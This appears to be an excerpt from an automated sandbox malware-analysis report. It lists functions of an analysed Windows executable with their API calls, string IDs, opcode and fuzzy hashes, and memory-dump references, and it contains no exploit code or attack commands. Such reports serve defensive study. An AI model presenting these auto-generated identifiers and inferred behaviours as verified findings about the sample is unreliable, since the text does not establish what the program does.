                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                • String ID: =pB$csm
                                • API String ID: 1170836740-1392728282
                                • Opcode ID: 9beb9f819c0e7aee48d55578513884957f918fe10c26fb20dc6de018ae5477eb
                                • Instruction ID: 7f369cdfd96b1624893db58878b682a399046fce48cbe8082f9a1018aa76e7c5
                                • Opcode Fuzzy Hash: 9beb9f819c0e7aee48d55578513884957f918fe10c26fb20dc6de018ae5477eb
                                • Instruction Fuzzy Hash: 2841E674F042289BCF10EF69D885A9E7FA0EF05314F54809BF8185B352D739AE51CB99
                                Function 00403F10 Relevance: 12.2, APIs: 8, Instructions: 159libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00403F52
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00403F95
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00403FD6
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00404017
                                • GetLastError.KERNEL32 ref: 00404064
                                • GetLastError.KERNEL32 ref: 00404086
                                • GetLastError.KERNEL32 ref: 004040AA
                                • GetLastError.KERNEL32 ref: 004040CE
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AddressErrorLastProc
                                • String ID:
                                • API String ID: 199729137-0
                                • Opcode ID: 7a975aa2f69a64b8912791f7b76017d45fc91f5708b384b5faeda784ea3770ba
                                • Instruction ID: cc098cb1151b383e2ffab1f06cc949a55b04afcad7da7766f18be12336fe413a
                                • Opcode Fuzzy Hash: 7a975aa2f69a64b8912791f7b76017d45fc91f5708b384b5faeda784ea3770ba
                                • Instruction Fuzzy Hash: E1516B74E042099FDB04CFA8C8547AEBFF0AF89304F1480BED955E7381DB7A9A448B95
                                Function 003E3F20 Relevance: 12.2, APIs: 8, Instructions: 153synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • WaitForSingleObject.KERNEL32(?,00000000), ref: 003E3F3A
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ObjectSingleWait
                                • String ID:
                                • API String ID: 24740636-0
                                • Opcode ID: 84c88ec11cf5f22c201f13ead85bdd2dc5f1e645d099c0380c5a868933ddb3cc
                                • Instruction ID: ec45167b500bca493d425871c7191aa06c67224458661d38b978016529ceecda
                                • Opcode Fuzzy Hash: 84c88ec11cf5f22c201f13ead85bdd2dc5f1e645d099c0380c5a868933ddb3cc
                                • Instruction Fuzzy Hash: 4B411B35B0011897DB11EB66EC05BBEB3A5DFC8314F10027AFD069B3C1EB359E158656
                                Function 00411990 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 322COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00424CCD: RtlAcquireSRWLockShared.NTDLL(?), ref: 00424CD3
                                • FreeLibrary.KERNEL32(00000000), ref: 00411DFC
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AcquireFreeLibraryLockShared
                                • String ID: PZ$P|$mfe_trust_init$mfe_trust_uninit$mfe_trust_validate
                                • API String ID: 1419617460-861292972
                                • Opcode ID: c37e4f46ed42f099d2c91c293caba41ec9f3038134d93d37d442686cab4d814a
                                • Instruction ID: 9d36f415e6a5a691c7dcde1f1375f85db7c23b313bcd781a8ce84057274afa88
                                • Opcode Fuzzy Hash: c37e4f46ed42f099d2c91c293caba41ec9f3038134d93d37d442686cab4d814a
                                • Instruction Fuzzy Hash: 84C1F470E00248DFDB10CFA8C945BDEBBB5EF45310F1081AEE519A7391D778AA84CB95
                                Function 003E47A0 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 308COMMON
                                Download Yara Rule
                                APIs
                                • VariantClear.OLEAUT32(0043A69D), ref: 003E49B8
                                • VariantInit.OLEAUT32(?), ref: 003E49EF
                                • VariantCopy.OLEAUT32(?,?), ref: 003E4A0D
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Variant$ClearCopyInit
                                • String ID: 8uD$hvD$hwD
                                • API String ID: 1785138364-2802233680
                                • Opcode ID: a3a8f27852ca483c9313393acd19162d27842485d9dce2e4226fef50532c1187
                                • Instruction ID: 7c2e03fe07a992cf4669f34fb7091261f546f4672e9f55cf9da4e72f80f561a7
                                • Opcode Fuzzy Hash: a3a8f27852ca483c9313393acd19162d27842485d9dce2e4226fef50532c1187
                                • Instruction Fuzzy Hash: 38B19A71E002A89BEB11EF65DC06BAEBB75EF08314F144329F805AB2C1E7756D40CB99
                                Function 003F0FF0 Relevance: 10.7, APIs: 7, Instructions: 246COMMON
                                Download Yara Rule
                                APIs
                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 003F1220
                                  • Part of subcall function 00425D49: RtlEnterCriticalSection.NTDLL(00464694), ref: 00425D54
                                  • Part of subcall function 00425D49: RtlLeaveCriticalSection.NTDLL(00464694), ref: 00425D91
                                • SetLastError.KERNEL32(00000000), ref: 003F12A9
                                • MapWindowPoints.USER32(000701F0,00000000,?,00000001), ref: 003F12C0
                                • GetLastError.KERNEL32 ref: 003F12CA
                                • SetWindowPos.USER32(000701F0,00000000,?,?,00000000,00000000,00000005), ref: 003F1337
                                • UpdateWindow.USER32(000701F0), ref: 003F1346
                                • Concurrency::cancel_current_task.LIBCPMT ref: 003F135B
                                  • Part of subcall function 00425CFF: RtlEnterCriticalSection.NTDLL(00464694), ref: 00425D09
                                  • Part of subcall function 00425CFF: RtlLeaveCriticalSection.NTDLL(00464694), ref: 00425D3C
                                  • Part of subcall function 00425CFF: RtlWakeAllConditionVariable.NTDLL ref: 00425DB3
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CriticalSection$Window$EnterErrorLastLeave$Concurrency::cancel_current_taskConditionInfoParametersPointsSystemUpdateVariableWake
                                • String ID:
                                • API String ID: 3866933946-0
                                • Opcode ID: 6c50c08ff0c79b8fcdaebee20e9c8251b0612af626e15f99e3e22c07615a09c0
                                • Instruction ID: 9446048998eb57219bc4f5386aa59110e5eed35e216ca59276237540b085543e
                                • Opcode Fuzzy Hash: 6c50c08ff0c79b8fcdaebee20e9c8251b0612af626e15f99e3e22c07615a09c0
                                • Instruction Fuzzy Hash: 7BA190B1900319DFDB21CF91EC45BEEB7B4BB05704F1086AEE504AB281EBB56A84CF55
                                Function 003F0BA0 Relevance: 10.7, APIs: 7, Instructions: 232COMMON
                                Download Yara Rule
                                APIs
                                • GetDC.USER32(00000000), ref: 003F0BD4
                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 003F0BEA
                                • GetDeviceCaps.GDI32(?,0000005A), ref: 003F0BF3
                                • ReleaseDC.USER32(00000000,?), ref: 003F0BFA
                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 003F0C7E
                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 003F0ED5
                                • UpdateWindow.USER32(?), ref: 003F0EE0
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CapsDeviceWindow$InfoParametersReleaseSystemUpdate
                                • String ID:
                                • API String ID: 4287873706-0
                                • Opcode ID: b091b315b09dfc03fff0fe7eaf3575e450c1f81752fef18073f479d1dbcdabb0
                                • Instruction ID: cc67cc4ee5b5daefad256917fb514197e6ea04062104999c15acd86a699fc150
                                • Opcode Fuzzy Hash: b091b315b09dfc03fff0fe7eaf3575e450c1f81752fef18073f479d1dbcdabb0
                                • Instruction Fuzzy Hash: B8A1E632C10F58DADB13DF78DC417AAB778BF6A395F119326F90576062EB30A8C18644
                                Function 003F8FC0 Relevance: 10.7, APIs: 7, Instructions: 209COMMON
                                Download Yara Rule
                                APIs
                                • __alldvrm.LIBCMT ref: 003F9069
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003F908B
                                • __Xtime_get_ticks.LIBCPMT ref: 003F90DE
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003F9169
                                • __Mtx_unlock.LIBCPMT ref: 003F91C1
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$Mtx_unlockXtime_get_ticks__alldvrm
                                • String ID:
                                • API String ID: 554389402-0
                                • Opcode ID: ce5d7909dfe8c0174c59397b75143f14abb84948a767dbbea9f02af211bd2039
                                • Instruction ID: 29e55edc298b633a429d1ff03a3af67201cb61bf8d3756a92a2504895e7b8b0a
                                • Opcode Fuzzy Hash: ce5d7909dfe8c0174c59397b75143f14abb84948a767dbbea9f02af211bd2039
                                • Instruction Fuzzy Hash: 8961F071E002199BCF15DFA9DC85BAEBBB9AF89314F15822BF615A7381D6349C00CB94
                                Function 00424E26 Relevance: 10.7, APIs: 7, Instructions: 190COMMON
                                Download Yara Rule
                                APIs
                                • GetFileAttributesExW.KERNEL32(?,00000000,?,?,?), ref: 00424EC8
                                • GetLastError.KERNEL32 ref: 00424ED2
                                • ___std_fs_open_handle@16.LIBCPMT ref: 00424F32
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AttributesErrorFileLast___std_fs_open_handle@16
                                • String ID:
                                • API String ID: 617199260-0
                                • Opcode ID: 282827c405338a3b7b5e745c927413c10c39439ac2086690d117783d87557043
                                • Instruction ID: f48ab97fd8ed163a04aadf726f69280f92e9732587cdbf4dffd01ba17145541c
                                • Opcode Fuzzy Hash: 282827c405338a3b7b5e745c927413c10c39439ac2086690d117783d87557043
                                • Instruction Fuzzy Hash: B961A070B007159BDB14CF68E941BAAB7B4FF85310F85421AEC25EB380E778D911CBA9
                                Function 00406280 Relevance: 10.7, APIs: 7, Instructions: 189fileCOMMON
                                Download Yara Rule
                                APIs
                                • Wow64DisableWow64FsRedirection.KERNEL32(?,?,?,A05DD77D,003E0000,?), ref: 00406365
                                • CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,02000000,00000000), ref: 0040637B
                                • GetLastError.KERNEL32 ref: 00406383
                                • Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 0040638F
                                • CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,02000000,00000000,?,?,A05DD77D,003E0000,?), ref: 004063B7
                                • GetLastError.KERNEL32 ref: 004063CC
                                • CloseHandle.KERNEL32(00000000), ref: 00406445
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Wow64$CreateErrorFileLastRedirection$CloseDisableHandleRevert
                                • String ID:
                                • API String ID: 1949712479-0
                                • Opcode ID: 2397e08833eb244b08a7b0001e44fcfc395f95831d1dad749054d01fc9c7353b
                                • Instruction ID: b2f1dc2ad22cdd57b7cd8635ca89a7a7b516d73a786a53ef923829ca3ede8573
                                • Opcode Fuzzy Hash: 2397e08833eb244b08a7b0001e44fcfc395f95831d1dad749054d01fc9c7353b
                                • Instruction Fuzzy Hash: E971D371D01218DBDF20CFA8D945BAEBBB0AF44714F25412AEC16B73C0D7786915CB99
                                Function 003F70B0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151threadCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 003F4E70: __Mtx_init_in_situ.LIBCPMT ref: 003F4ECC
                                  • Part of subcall function 003FA470: SysAllocStringLen.OLEAUT32(00000000,?), ref: 003FA4FA
                                  • Part of subcall function 003FFE90: QueryUnbiasedInterruptTimePrecise.KERNELBASE ref: 003FFEFD
                                  • Part of subcall function 003E7C00: SysAllocStringLen.OLEAUT32(00000000,00000014), ref: 003E7C16
                                • GetCurrentThreadId.KERNEL32 ref: 003F71C6
                                • SysFreeString.OLEAUT32(?), ref: 003F71F8
                                • SysFreeString.OLEAUT32(?), ref: 003F7202
                                • SysFreeString.OLEAUT32(?), ref: 003F720C
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: String$Free$Alloc$CurrentInterruptMtx_init_in_situPreciseQueryThreadTimeUnbiased
                                • String ID: dummy$signal_event
                                • API String ID: 1410445602-762517529
                                • Opcode ID: c5eb7bc52745dea85514a517ebbebe9562eaf397dc9179c7a98f8612e3beb077
                                • Instruction ID: 1f9238673bcbbf7be56c3428bdc788ccbb177b42bc919d83997d0cf093a75982
                                • Opcode Fuzzy Hash: c5eb7bc52745dea85514a517ebbebe9562eaf397dc9179c7a98f8612e3beb077
                                • Instruction Fuzzy Hash: 405129B5E042189FDB15DFA9D880BAEBBF9FF48310F10456AE915AB341EB349944CB90
                                Function 003E53A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 149synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcessId.KERNEL32(00000040,?,A05DD77D,?,004614D0), ref: 003E53D9
                                • CreateMutexExW.KERNEL32(00000000,?,00000000,001F0001,?,?,?,?,004614D0), ref: 003E5410
                                • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,?,?,?,?,004614D0), ref: 003E5433
                                • ReleaseMutex.KERNEL32(00000000), ref: 003E54C5
                                • CloseHandle.KERNEL32(?), ref: 003E550B
                                  • Part of subcall function 003E3040: GetLastError.KERNEL32(A05DD77D,?,?,?,0043A5D0,000000FF), ref: 003E306E
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Mutex$CloseCreateCurrentErrorHandleLastObjectProcessReleaseSingleWait
                                • String ID: Local\SM0:%lu:%lu:%hs
                                • API String ID: 908355122-2363530481
                                • Opcode ID: 62d3eff1a6d9cbfb795ef46ece1c99a0fb733246716e6ca402d7f6a4b3bf3d4c
                                • Instruction ID: 574a86eec19033b8e6c78928635e02e8199913f702d7f352d10d27a13ef56016
                                • Opcode Fuzzy Hash: 62d3eff1a6d9cbfb795ef46ece1c99a0fb733246716e6ca402d7f6a4b3bf3d4c
                                • Instruction Fuzzy Hash: DF416C75940178ABDB12DF56DC49BAB73A9DB85314F100368F80E973C1DB349E40CB60
                                Function 003E5560 Relevance: 10.6, APIs: 7, Instructions: 125memorysynchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • WaitForSingleObjectEx.KERNEL32(00000001,000000FF,00000000,?,00000000), ref: 003E558F
                                • CloseHandle.KERNEL32(00000000), ref: 003E5600
                                • CloseHandle.KERNEL32(00000000), ref: 003E560E
                                • CloseHandle.KERNEL32(00000001), ref: 003E561C
                                • GetProcessHeap.KERNEL32(00000000), ref: 003E5625
                                • HeapFree.KERNEL32(00000000), ref: 003E562C
                                • ReleaseMutex.KERNEL32(00000000), ref: 003E563B
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CloseHandle$Heap$FreeMutexObjectProcessReleaseSingleWait
                                • String ID:
                                • API String ID: 1978293137-0
                                • Opcode ID: 5d92a804a7cdd3c70a03551741bb0a171b70d102ae0f26c56e922923a0ec1d88
                                • Instruction ID: c768cc7c643e5f4c8b1be30df02730806a6a16320a08dc817f6763fdb769f364
                                • Opcode Fuzzy Hash: 5d92a804a7cdd3c70a03551741bb0a171b70d102ae0f26c56e922923a0ec1d88
                                • Instruction Fuzzy Hash: 7E31C175200AA59BDB26AF6AD844B2773DAAF91318F55462CF48AC72C1CB30EC01CB24
                                Function 003F4D00 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 102COMMON
                                Download Yara Rule
                                APIs
                                • ___std_exception_copy.LIBVCRUNTIME ref: 003F4D89
                                • ___std_exception_copy.LIBVCRUNTIME ref: 003F4DBC
                                • ___std_exception_destroy.LIBVCRUNTIME ref: 003F4DEF
                                • ___std_exception_destroy.LIBVCRUNTIME ref: 003F4E0B
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
